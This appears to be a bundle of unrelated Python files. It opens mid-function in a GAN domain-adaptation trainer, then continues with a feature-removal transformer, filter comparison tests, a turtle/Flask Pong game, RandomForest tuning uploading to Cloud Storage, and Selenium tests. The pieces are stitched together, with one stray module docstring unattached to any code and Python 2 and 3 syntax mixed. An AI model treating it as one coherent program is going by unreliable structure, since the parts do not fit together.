                          start,e, l_rec1, l_rec2,l_GenClass1, l_GenClass2, l_recClass):
    """Bump counters, refresh the progress bar with rolling loss means, and
    on the last batch of the epoch plot a generated batch and save each
    GAN's weights.

    Returns:
        (batch_counter, gen_iterations), each incremented by one.
    """
    gen_iterations += 1
    batch_counter += 1
    image_dim_ordering = 'th'
    # Report the rolling means of all loss windows on the Keras progbar.
    progbar.add(GANs[0].batch_size, values=[("Loss_D_real1", np.mean(l_disc_real1)),
                                            ("Loss_D_gen1", np.mean(l_disc_gen1)),
                                            ("Loss_G1", np.mean(l_gen_loss1)),
                                            ("Loss_Classifier1",np.mean(l_class_loss1)),
                                            ("Loss_D_real2", np.mean(l_disc_real2)),
                                            ("Loss_D_gen2", np.mean(l_disc_gen2)),
                                            ("Loss_G2", np.mean(l_gen_loss2)),
                                            ("Loss_Classifier2",np.mean(l_class_loss2)),
                                            ("Loss_Rec1", np.mean(l_rec1)),
                                            ("Loss_Rec2", np.mean(l_rec2)),
                                            ("Loss_GenClass1", np.mean(l_GenClass1)),
                                            ("Loss_AutoLabel", np.mean(l_GenClass2)),
                                            ("Loss_RecClass", np.mean(l_recClass))
                                            ])
    for GAN in GANs:
        # Plot images once per epoch.  Pick source/dest domains according to
        # this GAN's mapping direction.
        if GAN.dir == 'BtoA':
            X_source=B_data
            Y_source=B_labels
            X_dest = A_data
            Y_dest = A_labels
        elif GAN.dir == 'AtoB':
            X_source=A_data
            Y_source=A_labels
            X_dest = B_data
            Y_dest = B_labels
        if batch_counter == n_batch_per_epoch:
            #if batch_counter % (n_batch_per_epoch) == 0:
            X_source_batch_plot, Y_source_batch_plot, idx_source_plot = next(gen_batch(X_source, Y_source, batch_size=GAN.batch_size))
            returned_idx = plot_generated_batch(X_dest, X_source, GAN.generator_model, GAN.noise_dim, image_dim_ordering, idx_source_plot,
                                                batch_size=GAN.batch_size,different_idx=True, datagen=GAN.datagen, data_aug=GAN.data_aug)
            print ("Dest labels:")
            print (Y_dest[returned_idx].argmax(1))
            print ("Source labels:")
            print (Y_source_batch_plot.argmax(1))
            print('\nEpoch %s, Time: %s' % (e + 1, time.time() - start))
        else:
            idx_source_plot = 0
            Y_source_batch_plot = 0
        # Save model weights on the epoch's last batch (save_model_weights
        # itself decides how often to actually write, by default every 5 epochs).
        if batch_counter == n_batch_per_epoch:
            save_model_weights(GAN.generator_model, GAN.discriminator_model,
                               GAN.DCGAN_model, e, GAN.name, GAN.classificator_model, discriminator2=GAN.discriminator2)
    return batch_counter, gen_iterations
def pretrain_disc( GAN, A_data, A_labels,B_data, B_labels,class_weight, pretrain_iters=100, resume=False):
    """Warm up the discriminator before adversarial training starts.

    Runs `pretrain_iters` discriminator iterations via train_gan and discards
    the batches.  Skipped entirely when resuming from saved weights.
    """
    l_real = deque(10 * [0], 10)
    l_gen = deque(10 * [0], 10)
    l_genclass = deque(10 * [0], 10)
    if not resume:
        # `l_gen` doubles as both the generated-sample and generator loss
        # windows; only the discriminator statistics matter here.
        _, _, _, _ = train_gan(GAN, pretrain_iters, A_data, A_labels, B_data, B_labels, 1, l_real, l_gen,l_gen,l_genclass,class_weight)
        # Parenthesized print for Python 2/3 compatibility, consistent with
        # the print() calls used elsewhere in this file.
        print("Pretrain of discriminator finished.")
    else:
        print("resumed previous training.")
def testing_class_accuracy(GANs,classificator_model, generator_model, vis_samples, noise_dim, noise_scale, data, labels):
    """Evaluate classification accuracy on the target domain.

    For a 'BtoA' GAN the data is first mapped through its generator; for an
    'AtoB' GAN the data is classified directly.  Finally the two prediction
    sets are blended with coefficients 0.0..1.0 and each blend is scored.

    NOTE(review): p1/p2 are only bound inside their respective branches, so
    the final ensemble loop assumes `GANs` contains one GAN of each
    direction.  The classificator_model / generator_model / noise_dim /
    noise_scale arguments are unused; the per-GAN attributes are used instead.
    """
    acc=[]
    loss=[]
    for GAN in GANs:
        if GAN.dir == 'BtoA':
            # testing accuracy of trained classifier
            X_noise = sample_noise(GAN.noise_scale, vis_samples, GAN.noise_dim)
            Xsource_dataset_mapped = GAN.generator_model.predict(
                [X_noise, data[:vis_samples]], batch_size=1000)
            true_labels = labels[:vis_samples]
            p1 = GAN.classificator_model.predict(Xsource_dataset_mapped, batch_size=1000, verbose=1)
            # Accuracy = fraction of argmax matches against one-hot labels.
            score1 = np.sum(np.argmax(true_labels,axis=1) == np.argmax(p1, axis=1)) / float(true_labels.shape[0])
            print('\n Classifier Accuracy and loss on full target domain: %.2f%% ' %
                  ((100 * score1)))
        if GAN.dir == 'AtoB':
            X_noise = sample_noise(GAN.noise_scale, vis_samples, GAN.noise_dim)
            Xsource_dataset_mapped = data[:vis_samples]
            true_labels = labels[:vis_samples]
            p2 = GAN.classificator_model.predict(Xsource_dataset_mapped, batch_size=1000, verbose=1)
            score2 = np.sum(np.argmax(true_labels,axis=1) == np.argmax(p2, axis=1)) / float(true_labels.shape[0])
            print('\n Classifier Accuracy and loss on full target domain: %.2f%% ' %
                  ((100 * score2)))
    # Grid-search the ensembling coefficient between the two predictor sets.
    res = []
    for x in np.arange(0, 1.1, 0.1):
        res.append((x, np.sum(np.argmax(true_labels,axis=1) == np.argmax(p1*x + p2*(1-x), axis=1)) / float(true_labels.shape[0])))
    for (x, score) in res:
        print("\n Coeff: %f - score: %.2f" % (x, score*100))
def train(**kwargs):
    """
    Train standard DCGAN model

    Sets up two GAN directions ('AtoB' and 'BtoA'), pretrains both
    discriminators, wires up the cycle-reconstruction models, then
    alternates discriminator / generator / classifier / reconstruction
    updates for nb_epoch epochs, reporting accuracy after each epoch.

    args: **kwargs (dict) keyword arguments that specify the model hyperparameters
    """
    # Roll out the parameters
    generator = kwargs["generator"]
    discriminator = kwargs["discriminator"]
    dset = kwargs["dset"]
    img_dim = kwargs["img_dim"]
    nb_epoch = kwargs["nb_epoch"]
    batch_size = kwargs["batch_size"]
    n_batch_per_epoch = kwargs["n_batch_per_epoch"]
    bn_mode = kwargs["bn_mode"]
    noise_dim = kwargs["noise_dim"]
    noise_scale = kwargs["noise_scale"]
    # NOTE(review): lr_rec is read from "lr_D", not "lr_rec" -- confirm the
    # reconstruction LR is meant to track the discriminator LR.
    lr_rec = kwargs["lr_D"]
    opt_rec = kwargs["opt_rec"]
    lr_G = kwargs["lr_G"]
    lr_D = kwargs["lr_D"]
    opt_D = kwargs["opt_D"]
    opt_G = kwargs["opt_G"]
    use_mbd = kwargs["use_mbd"]
    image_dim_ordering = kwargs["image_dim_ordering"]
    epoch_size = n_batch_per_epoch * batch_size
    deterministic1 = kwargs["deterministic1"]
    deterministic2 = kwargs["deterministic2"]
    inject_noise = kwargs["inject_noise"]
    model = kwargs["model"]
    # NOTE(review): several of these (use_mbd, bn_mode, no_supertrain,
    # monsterClass, ...) are unpacked but not used in this function body.
    no_supertrain = kwargs["no_supertrain"]
    pureGAN = kwargs["pureGAN"]
    lsmooth = kwargs["lsmooth"]
    disc_type = kwargs["disc_type"]
    resume = kwargs["resume"]
    name = kwargs["name"]
    wd = kwargs["wd"]
    history_size = kwargs["history_size"]
    monsterClass = kwargs["monsterClass"]
    data_aug = kwargs["data_aug"]
    disc_iters = kwargs["disc_iterations"]
    class_weight = kwargs["class_weight"]
    reconst_w= kwargs["reconst_w"]
    rec = kwargs["rec"]
    reconstClass = kwargs["reconstClass"]
    pretrained = kwargs["pretrained"]
    print("\nExperiment parameters:")
    for key in kwargs.keys():
        print key, kwargs[key]
    print("\n")
    #####some extra parameters:
    noise_dim = (noise_dim,)  # the models expect a shape tuple
    name1 = name + '1'
    name2 = name + '2'
    # Setup environment (logging directory etc)
    general_utils.setup_logging("DCGAN")
    gen_iterations = 0
    # Loading data
    A_data, A_labels, B_data, B_labels, n_classes, img_A_dim, img_B_dim = load_data(img_dim, image_dim_ordering, dset)
    test_data, test_labels = load_testset(img_dim, image_dim_ordering, dset)
    if deterministic1 is None:
        deterministic1 = False
    if deterministic2 is None:
        deterministic2 = False
    ##### Setup GAN1 (direction AtoB)
    opt_D1, opt_G1, opt_C1, opt_Z1, opt_rec = build_opt(opt_D, opt_G, lr_D, lr_G, lr_rec, opt_rec)
    generator_model1, discriminator_model1,discriminator_class1, classificator_model1, DCGAN_model1, GenClass_model1, zclass_model1 = load_compile_models(noise_dim, img_A_dim, img_B_dim,
        deterministic1, pureGAN, wd, 'mse', 'categorical_crossentropy', disc_type, n_classes, opt_D1, opt_G1, opt_C1, opt_Z1, suffix=None, pretrained=pretrained)
    load_pretrained_weights(generator_model1, discriminator_model1,discriminator_class1, DCGAN_model1, name1, B_data, B_labels, noise_scale, classificator_model1, resume=resume)
    img_buffer1, datagen1 = load_buffer_and_augmentation(history_size, batch_size, img_A_dim, n_classes)
    GAN1=_GAN(generator_model1, discriminator_model1, discriminator_class1,DCGAN_model1,GenClass_model1,classificator_model1, batch_size, img_A_dim,img_B_dim, noise_dim, noise_scale,
        lr_D, lr_G, deterministic1, inject_noise, model, lsmooth, img_buffer1, datagen1, disc_type, data_aug, n_classes, disc_iters,name1, dir='AtoB' )
    pretrain_disc( GAN1, A_data,A_labels, B_data, B_labels,class_weight, pretrain_iters=500, resume=resume)
    #####################
    ##### Setup GAN2
    # NOTE(review): this build_opt call passes/receives fewer values than the
    # one above -- confirm build_opt supports both arities.
    opt_D2, opt_G2, opt_C2, opt_Z2 = build_opt(opt_D, opt_G, lr_D, lr_G)
    generator_model2, discriminator_model2, discriminator_class2, classificator_model2, DCGAN_model2, GenClass_model2, zclass_model2 = load_compile_models(noise_dim, img_B_dim, img_A_dim,
        deterministic2, pureGAN, wd, 'mse', 'categorical_crossentropy', disc_type, n_classes, opt_D2, opt_G2, opt_C2, opt_Z2, suffix=True)
    load_pretrained_weights(generator_model2, discriminator_model2,discriminator_class2, DCGAN_model2, name2, B_data, B_labels, noise_scale, classificator_model2, resume=resume)
    img_buffer2, datagen2 = load_buffer_and_augmentation(history_size, batch_size, img_B_dim, n_classes)
    gen_entropy2=None
    GAN2=_GAN(generator_model2, discriminator_model2, discriminator_class2, DCGAN_model2,GenClass_model2,classificator_model2, batch_size, img_B_dim,img_A_dim, noise_dim, noise_scale,
        lr_D, lr_G, deterministic2, inject_noise, model, lsmooth, img_buffer2, datagen2, disc_type, data_aug, n_classes, disc_iters, name2, dir='BtoA' )
    pretrain_disc( GAN2, A_data,A_labels, B_data, B_labels,class_weight, pretrain_iters=500, resume=resume)
    ################
    ####Reconstruction losses between Gen1 and Gen2:
    rec1, rec2, recClass = load_compile_reconstructions(generator_model1, generator_model2,noise_dim,img_A_dim,img_B_dim,opt_G,opt_rec, classificator_model2)
    if resume:
        testing_class_accuracy([GAN1,GAN2],GAN1.classificator_model, GAN1.generator_model,
                               test_data.shape[0], GAN1.noise_dim, GAN1.noise_scale, test_data, test_labels)
    # if two_gans:
    #     GANs=[GAN1,GAN2]
    # else:
    #     GANs=[GAN1]
    ################
    ##################
    for e in range(1, nb_epoch + 1):
        # Initialize progbar and batch counter
        progbar = generic_utils.Progbar(epoch_size,interval=0.2)
        batch_counter = 1
        start = time.time()
        while batch_counter < n_batch_per_epoch:
            # Fresh rolling loss windows each batch; the progbar shows means.
            l_disc_real1, l_disc_gen1, l_gen1, l_z1, l_class1,l_rec1,l_GenClass1,_ = get_loss_list()
            A_data_batch, A_labels_batch, B_data_batch, B_labels_batch = train_gan(GAN1, GAN1.disc_iters, A_data, A_labels, B_data, B_labels, batch_counter, l_disc_real1, l_disc_gen1, l_gen1,l_GenClass1, class_weight)
            l_disc_real2, l_disc_gen2, l_gen2, l_z2, l_class2, l_rec2, l_GenClass2, l_recClass = get_loss_list()
            A_data_batch, A_labels_batch, B_data_batch, B_labels_batch = train_gan(GAN2, GAN2.disc_iters, A_data, A_labels, B_data, B_labels, batch_counter, l_disc_real2, l_disc_gen2,l_gen2,l_GenClass2, class_weight)
            if rec:
                train_rec(GAN1, rec1, rec2, A_data_batch, B_data_batch,l_rec1, l_rec2,reconst_w)
            if reconstClass > 0.0:
                train_recClass(GAN1,recClass, A_data_batch, A_labels_batch, l_recClass, reconstClass)
            l_class1 = train_class(GAN1, l_class1, A_data_batch, A_labels_batch)
            l_class2 = train_class(GAN2, l_class2, A_data_batch, A_labels_batch)
            batch_counter, gen_iterations = visualize_save_stuffs([GAN1,GAN2], progbar, gen_iterations, batch_counter, n_batch_per_epoch,
                                                                  l_disc_real1, l_disc_gen1, l_gen1, l_class1, l_disc_real2, l_disc_gen2,
                                                                  l_gen2, l_class2, A_data, A_labels, B_data, B_labels,start,e,l_rec1, l_rec2,
                                                                  l_GenClass1, l_GenClass2, l_recClass)
        # End-of-epoch evaluation on the held-out test set.
        testing_class_accuracy([GAN1,GAN2],GAN1.classificator_model, GAN1.generator_model,
                               test_data.shape[0], GAN1.noise_dim, GAN1.noise_scale, test_data, test_labels)
        # testing_class_accuracy([GAN1],GAN1.classificator_model, GAN1.generator_model,
        #                        5000, GAN1.noise_dim, GAN1.noise_scale, B_data, B_labels)
|
from sklearn.base import BaseEstimator, TransformerMixin
import lightgbm as lgb
import numpy as np
import pandas as pd
class NonstationaryFeatureRemover(BaseEstimator, TransformerMixin):
    """Remove the features most predictive of row order (nonstationary ones).

    A LightGBM regressor is fit to predict each row's index; features with
    the highest importances in that model drift over the dataset's ordering,
    so they are dropped.

    Parameters
    ----------
    remove_count : int, optional
        Exact number of features to remove.
    remove_ratio : float, optional
        Fraction of features to remove.  Mutually exclusive with
        remove_count.
    """
    def __init__(self, remove_count=None, remove_ratio=None):
        # Compare against None so a legitimate remove_count=0 is not
        # confused with "unset"; ValueError instead of bare Exception.
        if remove_count is not None and remove_ratio is not None:
            raise ValueError('remove_count and remove_ratio cannot be set simultaneously')
        self.remove_count = remove_count
        self.remove_ratio = remove_ratio

    def fit(self, X, y=None):
        """Learn which feature columns to keep.  `y` is ignored."""
        X = self._validate_data(X)
        # A model that can predict the row index from the features is keying
        # on whatever varies systematically over the dataset's ordering.
        model = lgb.LGBMRegressor(n_jobs=-1, random_state=1)
        model.fit(X, np.arange(X.shape[0]))
        importances = model.feature_importances_
        if self.remove_count is not None:
            remove_count = self.remove_count
        elif self.remove_ratio is not None:
            remove_count = int(self.remove_ratio * X.shape[1])
        else:
            raise ValueError('either remove_count or remove_ratio must be set')
        # Drop the `remove_count` features with the largest importances;
        # a stable sort keeps tie-breaking deterministic.
        order = np.argsort(importances, kind='stable')
        dropped = set(order[X.shape[1] - remove_count:].tolist()) if remove_count > 0 else set()
        self.selected_features_ = np.array(
            [f for f in range(X.shape[1]) if f not in dropped], dtype=int)
        return self

    def transform(self, X, y=None):
        """Return a copy of X restricted to the columns kept by fit()."""
        X = self._validate_data(X)
        return X[:, self.selected_features_].copy()

    def inverse_transform(self, X, y=None):
        # The dropped columns are gone for good; no inverse exists.
        raise NotImplementedError('inverse_transform not implemented')
|
# %%
import multyscale
import RHS_filters
import numpy as np
import matplotlib.pyplot as plt
# %% RHS bank
# Reference filterbank from the RHS implementation, compared against below.
rhs_bank = RHS_filters.filterbank()
# %% Parameters of image
shape = (1024, 1024)  # filtershape in pixels
# visual extent, same convention as pyplot:
# (1023 / 32 corresponds to 32 pixels per degree of visual angle)
visextent = np.array([-0.5, 0.5, -0.5, 0.5]) * (1023 / 32)
# %% Create image coordinate system:
axish = np.linspace(visextent[0], visextent[1], shape[0])
axisv = np.linspace(visextent[2], visextent[3], shape[1])
(x, y) = np.meshgrid(axish, axisv)
# %% Circular Gaussian
def test_circular_Gaussian():
    """Multyscale's isotropic 2D Gaussian should match the RHS d2gauss filter."""
    sigma1 = 2
    sigmas = np.array([1, 1]) * sigma1
    # Our filter, normalised to unit sum.
    ours = multyscale.filters.gaussian2d(x, y, (sigmas[0], sigmas[1]))
    ours = ours / ours.sum()
    # Reference filter; RHS works in pixels, hence the factor of 32 (px/deg).
    theirs = RHS_filters.d2gauss(
        shape[0], sigmas[0] * 32, shape[1], sigmas[0] * 32, 0
    )
    # Visual comparison: images on top, central horizontal slices below.
    for panel, img in enumerate((ours, theirs), start=1):
        plt.subplot(2, 2, panel)
        plt.imshow(img)
    for panel, img in enumerate((ours, theirs), start=3):
        plt.subplot(2, 2, panel)
        plt.plot(img[512, :])
    assert np.allclose(ours, theirs)
# %% Elliptical Gaussian
def test_elliptical_Gaussian():
    """An anisotropic, rotated Gaussian should match RHS's d2gauss output."""
    sigma1 = 2
    orientation = 40
    sigma2 = 2 * sigma1
    sigmas = np.array([1, 1]) * np.array([sigma1, sigma2])
    ours = multyscale.filters.gaussian2d(
        x, y, (sigmas[0], sigmas[1]), orientation=orientation
    )
    ours = ours / ours.sum()  # normalise to unit sum
    # RHS takes sizes in pixels (32 px/deg), hence the scaling.
    theirs = RHS_filters.d2gauss(
        shape[0], sigmas[0] * 32, shape[1], sigmas[1] * 32, orientation
    )
    # Images on top, central horizontal slices below.
    for panel, img in enumerate((ours, theirs), start=1):
        plt.subplot(2, 2, panel)
        plt.imshow(img)
    for panel, img in enumerate((ours, theirs), start=3):
        plt.subplot(2, 2, panel)
        plt.plot(img[512, :])
    assert np.allclose(ours, theirs)
# %% ODOG
def test_ODOG():
    """The oriented difference-of-Gaussians filters of both packages agree."""
    orientation = 150
    sigma3 = 2
    # Center is isotropic; surround is elongated 2x along one axis.
    sigmas = np.array([[1, 1], [1, 2]]) * sigma3
    reference = RHS_filters.odog(
        shape[0], shape[1], sigma3 * 32, orientation=orientation
    )
    candidate = multyscale.filters.odog(
        x, y, sigmas, orientation=(orientation, orientation)
    )
    # Images on top, central horizontal slices below.
    for panel, img in enumerate((reference, candidate), start=1):
        plt.subplot(2, 2, panel)
        plt.imshow(img)
    for panel, img in enumerate((reference, candidate), start=3):
        plt.subplot(2, 2, panel)
        plt.plot(img[512, :])
    assert np.allclose(reference, candidate)
|
# A simple Ping Pong game using Python 3 Programming language and the module called turtle
#By Edna Sawe Kite
#Import the required modules
import turtle
import winsound
import flask
from flask import Flask, render_template
app = Flask(__name__)
@app.route('/')
def index():
    # Serve the landing page template.
    return render_template('index.html')
@app.route('/pong.py/')
def pong():
    print('Start Game')
    return 'PLAY'
# NOTE(review): app.run() blocks, so when this file is executed directly the
# turtle game defined below never starts; when the file is imported instead,
# the game code runs but the Flask app does not.  Confirm whether this web
# wrapper is still wanted in the same module as the game.
if __name__ == '__main__':
    app.run(debug=True)
#Create the game screen
windw = turtle.Screen()
windw.title("Ping Pong Game by Edna Sawe")
windw.bgcolor("green")
windw.setup(width=800, height=600)
windw.tracer(0)  # disable auto-refresh; the main loop calls windw.update()
#Create the score counters for the two players
score_right = 0
score_left = 0
#Create the left paddle of the game
paddle_left = turtle.Turtle()
paddle_left.speed(1)
paddle_left.shape("square")
paddle_left.shapesize(stretch_wid=5, stretch_len=1)  # 100x20 px paddle
paddle_left.color("black")
paddle_left.penup()
paddle_left.goto(-350, 0)
#Create the right paddle of the game
paddle_right = turtle.Turtle()
paddle_right.speed(1)
paddle_right.shape("square")
paddle_right.shapesize(stretch_wid=5, stretch_len=1)
paddle_right.color("black")
paddle_right.penup()
paddle_right.goto(350, 0)
#Creating the white ball
ball = turtle.Turtle()
ball.speed(1)
ball.shape("circle")
ball.color("white")
ball.penup()
ball.goto(0, 0)
# Per-frame velocity components of the ball.
ball.dx = 0.5
ball.dy = 0.8
#Creating the pen to record players' scores
pen = turtle.Turtle()
pen.speed(1)
pen.shape("circle")
pen.color("white")
pen.penup()
pen.hideturtle()
pen.goto(0, 260)
pen.write("PLAYER A: 0 PLAYER B: 0", align="center", font=("Courier", 28, "normal"))
#Creating function to play the game
def paddle_left_up():
    """Move the left paddle 20 px up (bound to the 'w' key)."""
    paddle_left.sety(paddle_left.ycor() + 20)
def paddle_left_down():
    """Move the left paddle 20 px down (bound to the 's' key)."""
    paddle_left.sety(paddle_left.ycor() - 20)
def paddle_right_up():
    """Move the right paddle 20 px up (bound to the Up arrow)."""
    paddle_right.sety(paddle_right.ycor() + 20)
def paddle_right_down():
    """Move the right paddle 20 px down (bound to the Down arrow)."""
    paddle_right.sety(paddle_right.ycor() - 20)
#Creating the keyboard bindings to use when playing the game
# Left paddle: w/s.  Right paddle: Up/Down arrows.
windw.listen()
windw.onkeypress(paddle_left_up, "w")
windw.onkeypress(paddle_left_down, "s")
windw.onkeypress(paddle_right_up, "Up")
windw.onkeypress(paddle_right_down, "Down")
#Create the main game looping function
# NOTE(review): winsound is Windows-only; on other platforms the import at
# the top of the file already fails.
while True:
    windw.update()
    #Moving the ball by its per-frame velocity
    ball.setx(ball.xcor() + ball.dx)
    ball.sety(ball.ycor() + ball.dy)
    #Checking the border on top, bottom, right, and left
    if ball.ycor() > 290:
        # Bounce off the top wall.
        ball.sety(290)
        ball.dy *= -1
        winsound.PlaySound("bounce.wav", winsound.SND_ASYNC)
    elif ball.ycor() < -290:
        # Bounce off the bottom wall.
        ball.sety(-290)
        ball.dy *= -1
        winsound.PlaySound("bounce.wav", winsound.SND_ASYNC)
    if ball.xcor() > 350:
        # Ball passed the right paddle: point for the left player; reset.
        score_left += 1
        pen.clear()
        pen.write("PLAYER A: {} PLAYER B: {}".format(score_left, score_right), align="center", font=("Courier", 28, "normal"))
        ball.goto(0, 0)
        ball.dx *= -1
    elif ball.xcor() < -350:
        # Ball passed the left paddle: point for the right player; reset.
        score_right += 1
        pen.clear()
        pen.write("PLAYER A: {} PLAYER B: {}".format(score_left, score_right), align="center", font=("Courier", 28, "normal"))
        ball.goto(0, 0)
        ball.dx *= -1
    #Paddle and ball collisions: reverse horizontal direction when the ball
    #is level with a paddle near either edge.
    if ball.xcor() < -340 and ball.ycor() < paddle_left.ycor() + 50 and ball.ycor() > paddle_left.ycor() - 50:
        ball.dx *= -1
        winsound.PlaySound("bounce.wav", winsound.SND_ASYNC)
    elif ball.xcor() > 340 and ball.ycor() < paddle_right.ycor() + 50 and ball.ycor() > paddle_right.ycor() - 50:
        ball.dx *= -1
        winsound.PlaySound("bounce.wav", winsound.SND_ASYNC)
|
from google.cloud import storage
import json
import logging
import numpy as np
import pandas as pd
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import train_test_split
def complete_hp_tuning(x_train_part, y_train_part, project_id, bucket_name, num_iterations):
    """Random-search hyperparameter tuning for a RandomForestClassifier.

    Runs `num_iterations` trials: each trial re-splits the data 80/20,
    samples a random hyperparameter set, trains, and scores exact-match
    accuracy on the held-out split.  The best parameter set is written to
    best_params.json and uploaded to Cloud Storage.

    Args:
        x_train_part: feature matrix (array-like / DataFrame).
        y_train_part: labels (DataFrame/Series; rows are compared via .values).
        project_id: GCP project for the storage client.
        bucket_name: destination bucket for best_params.json.
        num_iterations: number of random-search trials.

    Returns:
        dict with the best hyperparameters found.
    """
    best_accuracy = -1
    best_params = None
    for i in range(num_iterations):
        # Fresh random train/validation split each trial.
        x_train, x_test, y_train, y_test = train_test_split(x_train_part, y_train_part, test_size=0.2)
        # Randomly sample hyperparameters.
        n_estimators = np.random.randint(10, 1000)
        max_depth = np.random.randint(10, 1000)
        min_samples_split = np.random.randint(2, 10)
        min_samples_leaf = np.random.randint(1, 10)
        # BUGFIX: randint's high bound is exclusive, so the previous
        # randint(0, 3) could never select None from this 4-element list.
        max_features = ['auto', 'sqrt', 'log2', None][np.random.randint(0, 4)]
        # Fit the model on the training split with the sampled parameters.
        rf_model = RandomForestClassifier(n_estimators=n_estimators, max_depth=max_depth,
                                          min_samples_split=min_samples_split,
                                          min_samples_leaf=min_samples_leaf,
                                          max_features=max_features)
        rf_model.fit(x_train, y_train)
        y_pred = rf_model.predict(x_test)
        # Exact-match accuracy: a prediction row counts only if it equals the
        # whole label row (handles multi-output labels via array_equal).
        total_preds = y_pred.shape[0]
        total_correct = sum(
            1 for j in range(total_preds)
            if np.array_equal(y_pred[j], y_test.values[j])
        )
        accuracy = float(total_correct) / total_preds
        # Keep the best parameter set seen so far.
        if accuracy > best_accuracy:
            best_accuracy = accuracy
            best_params = {'n_estimators': n_estimators,
                           'max_depth': max_depth,
                           'min_samples_split': min_samples_split,
                           'min_samples_leaf': min_samples_leaf,
                           'max_features': max_features}
        logging.info('Completed hp tuning interation {}, best accuracy {} with params {}'.format(str(i + 1), str(best_accuracy), best_params))
    # Persist the winning parameters to disk (context manager closes the file).
    with open('best_params.json', 'w') as f:
        f.write(json.dumps(best_params))
    # Upload the result to Cloud Storage.
    storage_client = storage.Client(project=project_id)
    bucket = storage_client.get_bucket(bucket_name)
    blob = bucket.blob('best_params.json')
    blob.upload_from_filename('best_params.json')
    return best_params
#
# author: Jungtaek Kim (jtkim@postech.ac.kr)
# last updated: December 29, 2020
#
"""These files are for implementing Student-:math:`t` process regression.
It is implemented, based on the following article:
(i) Rasmussen, C. E., & Williams, C. K. I. (2006). Gaussian Processes
for Machine Learning. MIT Press.
(ii) Shah, A., Wilson, A. G., & Ghahramani, Z. (2014). Student-t Processes
as Alternatives to Gaussian Processes. In Proceedings of the 17th
International Conference on Artificial Intelligence and Statistics
(pp. 877-885)."""
|
"""
tests.py
Automated tests that are written here are run with the manage.py test command.
Included is an automated Selenium test written by Jaimes Subroto.
"""
from django.test import TestCase
# Create your tests here.
# -*- coding: utf-8 -*-
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import Select
from selenium.common.exceptions import NoSuchElementException
from selenium.common.exceptions import NoAlertPresentException
import unittest, time, re
chromedriver_path = '<C:/YOUR/chromedriver.exe_path>'
class ChromePark(unittest.TestCase):
    """Selenium smoke test: searching "head" surfaces the Heron's Head Park
    reports with the expected park/date/category/issue fields."""
    def setUp(self):
        # self.driver = webdriver.Firefox()
        # chromedriver_path must point at a local chromedriver binary.
        self.driver = webdriver.Chrome(chromedriver_path)
        self.driver.implicitly_wait(30)
        self.base_url = "https://www.katalon.com/"
        self.verificationErrors = []
        self.accept_next_alert = True
    def test_chrome_park(self):
        # Search for "head" and assert on the rendered report fields by XPath.
        driver = self.driver
        driver.get("http://35.230.88.48/")
        driver.find_element_by_name("q").clear()
        driver.find_element_by_name("q").send_keys("head")
        driver.find_element_by_name("q").send_keys(Keys.ENTER)
        self.assertEqual("Heron's Head Park", driver.find_element_by_xpath("//div/div[2]/p/strong").text)
        self.assertEqual("April 24, 2018, 9:52 a.m.", driver.find_element_by_xpath("//div/div[2]/p[2]/strong").text)
        self.assertEqual("Bathroom", driver.find_element_by_xpath("//p[3]/strong").text)
        self.assertEqual("Weird toilet signs", driver.find_element_by_xpath("//p[4]/strong").text)
        self.assertEqual("Park: Heron's Head Park", driver.find_element_by_xpath("//div[2]/div[2]/p").text)
        self.assertEqual("Date: April 24, 2018, 9:56 a.m.", driver.find_element_by_xpath("//div[2]/div[2]/p[2]").text)
        self.assertEqual("Category: Medical Waste", driver.find_element_by_xpath("//div[2]/div[2]/p[3]").text)
        self.assertEqual("Issue: Park is entirely giant pills", driver.find_element_by_xpath("//div[2]/div[2]/p[4]").text)
    # The helpers below are standard Selenium-IDE export boilerplate.
    def is_element_present(self, how, what):
        try: self.driver.find_element(by=how, value=what)
        except NoSuchElementException as e: return False
        return True
    def is_alert_present(self):
        # NOTE(review): switch_to_alert() is deprecated; switch_to.alert is
        # the modern spelling (also used in the sibling classes below).
        try: self.driver.switch_to_alert()
        except NoAlertPresentException as e: return False
        return True
    def close_alert_and_get_its_text(self):
        try:
            alert = self.driver.switch_to_alert()
            alert_text = alert.text
            if self.accept_next_alert:
                alert.accept()
            else:
                alert.dismiss()
            return alert_text
        finally: self.accept_next_alert = True
    def tearDown(self):
        self.driver.quit()
        self.assertEqual([], self.verificationErrors)
# NOTE(review): this guard is repeated after each test class in this file;
# a single one at the end of the module would suffice.
if __name__ == "__main__":
    unittest.main()
class ChromeInvalid(unittest.TestCase):
    """Selenium test: a non-alphanumeric search term shows the validation
    message instead of results."""
    def setUp(self):
        self.driver = webdriver.Chrome(chromedriver_path)
        self.driver.implicitly_wait(30)
        self.base_url = "https://www.katalon.com/"
        self.verificationErrors = []
        self.accept_next_alert = True
    def test_chrome_invalid(self):
        driver = self.driver
        driver.get("http://35.230.88.48/")
        driver.find_element_by_name("q").clear()
        driver.find_element_by_name("q").send_keys("-1234")
        driver.find_element_by_name("q").send_keys(Keys.ENTER)
        self.assertEqual("Please enter alphanumeric characters only. Search either by zip code or park name.", driver.find_element_by_xpath("//p[3]").text)
    # Standard Selenium-IDE export boilerplate helpers.
    def is_element_present(self, how, what):
        try: self.driver.find_element(by=how, value=what)
        except NoSuchElementException as e: return False
        return True
    def is_alert_present(self):
        try: self.driver.switch_to_alert()
        except NoAlertPresentException as e: return False
        return True
    def close_alert_and_get_its_text(self):
        try:
            alert = self.driver.switch_to_alert()
            alert_text = alert.text
            if self.accept_next_alert:
                alert.accept()
            else:
                alert.dismiss()
            return alert_text
        finally: self.accept_next_alert = True
    def tearDown(self):
        self.driver.quit()
        self.assertEqual([], self.verificationErrors)
if __name__ == "__main__":
    unittest.main()
class ChromeSimilar(unittest.TestCase):
    """Checks the fallback message when a zip search only matches by category."""

    def setUp(self):
        self.driver = webdriver.Chrome(chromedriver_path)
        self.driver.implicitly_wait(30)
        self.base_url = "https://www.katalon.com/"
        self.verificationErrors = []
        self.accept_next_alert = True

    def test_chrome_similar(self):
        driver = self.driver
        driver.get("http://35.230.88.48/")
        Select(driver.find_element_by_name("dropdown")).select_by_visible_text("Bathroom")
        search_box = driver.find_element_by_name("q")
        search_box.clear()
        search_box.send_keys("94110")
        search_box.send_keys(Keys.ENTER)
        self.assertEqual(
            "No parks matched your zip code, here are reports that share the bathroom category.",
            driver.find_element_by_xpath("//div[1]/p[2]").text,
        )

    def is_element_present(self, how, what):
        """Return True if an element located by (how, what) exists."""
        try:
            self.driver.find_element(by=how, value=what)
        except NoSuchElementException:
            return False
        return True

